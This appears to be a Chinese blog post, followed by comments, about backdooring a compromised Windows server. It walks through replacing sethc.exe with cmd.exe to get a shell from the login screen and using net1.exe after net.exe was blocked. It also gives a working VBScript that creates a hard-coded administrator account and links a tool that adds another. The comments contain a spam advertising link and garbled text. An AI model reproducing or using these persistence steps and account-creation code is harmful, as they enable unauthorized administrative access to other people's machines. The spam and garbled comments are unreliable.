接下来的思路就是通过替换sethc.exe为cmd.exe(改名覆盖),然后远程登录按5下shift激活运行sethc.exe,添加管理员。
但是当cmd运行起来后,执行net user命令的时候提示没有权限(如下图所示),上传了一个net.exe到C根目录下,执行仍然提示没有权限:
![](/uploads/files/month_201011/10_152130_wtl1net.jpg)
尝试上传net1.exe (和net.exe一样,都在system32下)到C根目录,这样执行竟然成功了,如下图所示。
![](/uploads/files/month_201011/10_152524_b91enet1_ok.jpg)
后来网上查了一下,net.exe 在执行某些命令的时候是通过调用net1.exe来实现的,看来管理员只是禁用了net.exe的执行,而没有禁用net1.exe的执行。但是问题又来了,那为什么我上传的那个net.exe也不能执行呢?
附:下面的vbs可以不使用net和net1进行管理员的添加
'注意用户名不要和计算机名相同,否则添加到用户组时会失败
'添加用户
'注意用户名不要和计算机名相同,否则添加到用户组时会失败
on error resume next
Set AccountObj = GetObject("WinNT://127.0.0.1")
Set NewUser = AccountObj.Create("User", "redicecn") '用户名是redicecn
NewUser.SetPassword "redicecn" '密码是redicecn
NewUser.UserFlags = &H10000
NewUser.SetInfo
'将用户添加到管理员组
Set GroupObj = AccountObj.GetObject("Group","Administrators")
GroupObj.Add "winnt://redicecn" '添加redicecn进入管理员组
File: Click to Download
另外找到一个命令程序,执行后即可添加管理员,用户名及密码均是:wlozz
File: Click to Download
呵呵,谢谢
VaTG790i.最好的<a href=http://www.kyfei.com>网站推广软件</a>,
非常好
....................
;ui;普i;uighur;ui;ui;个
在unix网络编程中看到了关于TCP/IP的一些内容,我感觉还是写的不够。正在下载中,一定
下载地址呢